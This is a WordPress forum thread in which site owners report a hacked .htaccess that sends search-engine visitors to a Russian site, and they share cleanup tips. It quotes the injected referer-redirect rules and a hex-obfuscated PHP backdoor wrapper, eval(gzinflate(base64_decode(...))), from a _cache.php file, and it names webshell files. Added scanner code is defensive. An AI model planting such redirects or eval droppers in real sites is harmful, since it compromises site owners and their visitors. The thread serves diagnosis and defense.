• I updated all sites to the recent WordPress 3.3.1

    Here is the code that keeps redirecting to a Russian site. I delete it and it just reappears. I changed passwords in WordPress, changed my hosting password. Still it keeps appearing. Anyone know how to get rid of it, or what plugin is causing this entry of hack?

    Code in .htaccess

    <IfModule mod_rewrite.c>
    																														RewriteEngine On
    																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
    																														RewriteRule ^(.*)$ https://[ link redacted ] [R=301,L]
    																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
    																														RewriteRule ^(.*)$ https://[ link redacted ] [R=301,L]
    																														</IfModule>																														
    
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    
    # END WordPress
    
    																														ErrorDocument 400 https://[ link redacted ]
    																														ErrorDocument 401 https://[ link redacted ]
    																														ErrorDocument 403 https://[ link redacted ]
    																														ErrorDocument 404 https://[ link redacted ]
    																														ErrorDocument 500 https://[ link redacted ]
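The injected file above has two signatures that can be checked mechanically: a `RewriteRule` sending visitors to another host behind a `RewriteCond` on `HTTP_REFERER`, and `ErrorDocument` directives pointing off-site. The following audit is an added example, not code from the thread; the sample is constructed, `redirect.example` stands in for the redacted link, and the `own_hosts` default is an assumed site name.

```python
from urllib.parse import urlparse

# Constructed sample modelled on the file in the post; the redacted target is
# replaced by the placeholder host redirect.example and the referer list is shortened.
SAMPLE = (
    "<IfModule mod_rewrite.c>\n"
    "\t\t\t\tRewriteEngine On\n"
    "\t\t\t\tRewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|bing)\\.(.*)\n"
    "\t\t\t\tRewriteRule ^(.*)$ https://redirect.example/ [R=301,L]\n"
    "</IfModule>\n"
    "# BEGIN WordPress\n"
    "<IfModule mod_rewrite.c>\n"
    "RewriteEngine On\n"
    "RewriteBase /\n"
    "RewriteCond %{REQUEST_FILENAME} !-f\n"
    "RewriteCond %{REQUEST_FILENAME} !-d\n"
    "RewriteRule . /index.php [L]\n"
    "</IfModule>\n"
    "# END WordPress\n"
    "\t\t\t\tErrorDocument 404 https://redirect.example/\n"
)

def external(target, own_hosts):
    """True if target is an absolute URL whose host is not one of ours."""
    host = urlparse(target).hostname
    return host is not None and host.lower() not in own_hosts

def audit_htaccess(text, own_hosts=("example.org", "www.example.org")):
    """Return (line_no, reason) for directives matching the injected pattern."""
    findings, referer_cond = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        name = parts[0].lower()
        if name == "rewritecond":
            # Conditions accumulate until the next RewriteRule consumes them.
            referer_cond |= len(parts) > 1 and "HTTP_REFERER" in parts[1].upper()
        elif name == "rewriterule":
            if len(parts) > 2 and external(parts[2], own_hosts):
                why = "referer-gated" if referer_cond else "unconditional"
                findings.append((no, why + " redirect to " + parts[2]))
            referer_cond = False
        elif name == "errordocument" and len(parts) > 2 and external(parts[2], own_hosts):
            findings.append((no, "ErrorDocument " + parts[1] + " sent off-site: " + parts[2]))
    return findings
```

The stock WordPress block produces no findings because its `RewriteRule` target is a local path. Run this against every `.htaccess` in the account, not only the one in the WordPress directory.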

Viewing 14 replies - 16 through 29 (of 29 total)
  • Did anyone find a solution?
    Thanks

    I was also told that putting the following line into htaccess would help
    RewriteRule \.ht[ap] - [NC,F]
    Thanks

    Did anyone find a solution?

    Scroll up and read Jan Dembowski’s post.

    @kmessinger I did, but as this is not a WordPress specific issue, and I was looking for the cause rather than just recovering after the problem.

    It seems everyone is at a loss right now as to how to stop it happening again.
    https://forum.joomla.org/viewtopic.php?f=432&t=705216&start=60#p2778501

    I was looking for the cause

    There is always a way to get in if someone wants to badly enough. Right now the shared servers most of us use make it a lot easier.

    The war against hackers won’t be won unless companies change the way they use computer networks. UPDATED with a comment provided by the FBI. https://www.tomsguide.com/us/Hackers-FBI-Shawn-Henry-Anonymous-LulzSec,news-14627.html

    https://codex.wordpress.org/Hardening_WordPress will help. Good karma will help.

    Be sure to look up and down ALL the directories in your hosting. I found random .php files in several places in my directory tree, far away from where my WordPress installation was.

    Look for PHP files with strange names. Look for PHP files where they don’t belong — in directories by themselves, in image directories, in directories full of HTML files, with your error pages.

    Look at the modification dates especially. Sort the files in each directory by modification date. Chances are you’ll see suspicious files modified in the last week or two in places where you know you weren’t working.

    Wherever they are, they can go off and rewrite your .htaccess files.

    Both /mylogin/.htaccess and /mylogin/public_html/.htaccess get modified. Redirecting to random .ru websites.

    How did I miss this post? I was searching all around for the solution.
    Now, I found the wp-content\upload\_cache.php file with encrypted code and did some research.

    <?php
    preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28'
    .......
    '\x29\x29\x20\x29\x20\x3b",".");?>

    It decodes to

    <?php
    preg_replace("/.*/e","eval ( gzinflate ( base64_decode ('
    ........
    ')) ) ;",".");?>

    Running it on server, you can see it in action : a real Backdoor.
    This is just “one” example, there are many out there, with name other than “_cache.php” all due to this thumb.php lying there in some of my old inactive theme.

    Tired of this hack, facing since last 3 months, but there was no problem in viewing the site. I finally erased everything last night, and now rebuilding it again, after my site got black-listed in Google search.
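The `_cache.php` sample above hides its calls behind `\xNN` escapes and extra spaces, so a plain text search for `eval` or `base64_decode` misses it. The scanner below is an added example, not code from the thread: it decodes the escapes before matching and also flags any PHP file under an upload directory. The file tree it scans is constructed, with an inert placeholder where the post elides the payload.

```python
import os, re, tempfile

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# Checked after hex escapes are decoded and whitespace is stripped.
PATTERNS = {
    "preg_replace with /e modifier": re.compile(
        r'''preg_replace\((["'])(.)[^"']*\2[a-z]*e[a-z]*\1''', re.I),
    "eval of decoded/inflated data": re.compile(
        r"eval\((gzinflate|gzuncompress|base64_decode|str_rot13)\(", re.I),
}
# Escaped prefix copied from the _cache.php sample in the post.
HEXED = (r"\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65"
         r"\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28")

def deobfuscate(src):
    """Decode \\xNN escapes, then drop whitespace so spaced-out calls match."""
    plain = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), src)
    return re.sub(r"\s+", "", plain)

def scan_tree(root):
    """Return {relative_path: [reasons]} for suspicious PHP files under root."""
    hits = {}
    for folder, _, names in os.walk(root):
        for name in (n for n in names if n.lower().endswith(".php")):
            path = os.path.join(folder, name)
            with open(path, encoding="latin-1") as fh:
                code = deobfuscate(fh.read())
            reasons = [why for why, rx in PATTERNS.items() if rx.search(code)]
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if re.search(r"(^|/)uploads?/", rel):
                reasons.append("PHP file inside an upload directory")
            if reasons:
                hits[rel] = reasons
    return hits

def demo():
    """Scan a constructed tree: one dropper-shaped file (inert body), one benign."""
    files = {
        "wp-content/uploads/_cache.php":
            '<?php preg_replace("/.*/e","' + HEXED + "'PLACEHOLDER')));\",\".\");?>",
        "wp-content/themes/demo/index.php": "<?php echo 'hello'; ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
        return scan_tree(root)
```

Point `scan_tree` at the top of the hosting account rather than the WordPress directory alone, since posters in this thread found files in unrelated directories.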

    I encountered a very similar problem today. My htaccess file looks very similar to the OP’s.

    In my case there were no _cache.php files, but there was a mystery folder (named ‘zreqgigkqvt’) in the wp-content/plugins folder. This folder does not show up in the WordPress plugin list. Contents include edw.php and gsm.php, which contain PhpShel-G and PHPShell-A trojans respectively. It also contains several other random-character-name folders, all of which contain edw.php and lists of words to target (viagra, cialis, etc).

    edw.php also contains references to mx.hotmail.com and port 25.

    I found the same problem today, 1.: the htaccess looked nearly like this from ramirez_fabian above, 2.: there was a second index.php: called Index.php.
    3: I deleted all, but one hour later the htaccess was once more corrupted, then I found a file “.000_cache.php” in the upload-folder, since I deleted this it works, but some security software still does not let people onto my site.

    Excuse my bad english.

    I had the same problem with the .htaccess files.

    I found the file _cache.php and I erased it. Also, I erased all the .htaccess files and replaced them with new empty ones.

    The problem was solved.

    It’s better to erase all the data and install a fresh WordPress copy.

    I recently started a WordPress site and now I find I’m getting emails warning me my site now has a ‘registered new user’. In fact, I’m getting dozens of these advisory emails and when I log-on to my site I find I’ve got hundreds of posts for other sites/products.
    1- How can I block these people access to my site
    2 – I have found several Usernames listed on the log-in menu but only my password
    3 – How can I block my password from automatically coming up as soon as I hit my listed Username?

    Help! Please as I fear losing my site completely to all this SPAM stuff or someone smarter than me taking control of my domain and locking me out or doing something illegal.
    Eddieman.

    I’ve been having the same issue as this for the last while as well. However, in my case I wasn’t able to locate any problematic files in the uploads. In the situation of my client I found code in the cgi folder off root and it was named ‘wp-xgqdi.php’.

    I’ve deleted the file, cleaned up the .htaccess files and notified Google of the resolution. I’ll post in here if my issue is resolved.

    I found a _cache.php file hidden on my hosting account (Bluehost) on a site I haven’t touched in over a year. Deleted the file and everything seems to be okay so far. (It’s been 2 hours).

    Just following up. Been a week since I removed the file and it is still clean.

  • The topic ‘.htaccess Hacked, Redirects to Russion Site’ is closed to new replies.